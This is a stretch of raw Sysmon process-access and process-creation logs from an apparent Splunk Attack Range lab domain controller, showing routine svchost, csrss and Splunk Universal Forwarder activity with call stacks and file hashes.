13:52:45.644{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.644{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-92AD-6005-BC04-00000000A301}4904C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.644{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92AD-6005-BC04-00000000A301}4904C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:45.504{59A5CD1D-92AD-6005-BC04-00000000A301}4904C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.457{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92AE-6005-BD04-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.457{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:46.457{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.457{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:46.457{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.457{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:46.457{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.457{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:46.457{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009073Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.457{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009072Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.457{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-92AE-6005-BD04-00000000A301}664C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009071Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.457{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-92AE-6005-BD04-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009070Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:46.317{59A5CD1D-92AE-6005-BD04-00000000A301}664C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.285{59A5CD1D-92AF-6005-BE04-00000000A301}26402896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.144{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-92AF-6005-BE04-00000000A301}2640C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:47.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:47.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009091Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009090Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:47.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:52:47.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:52:47.144{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 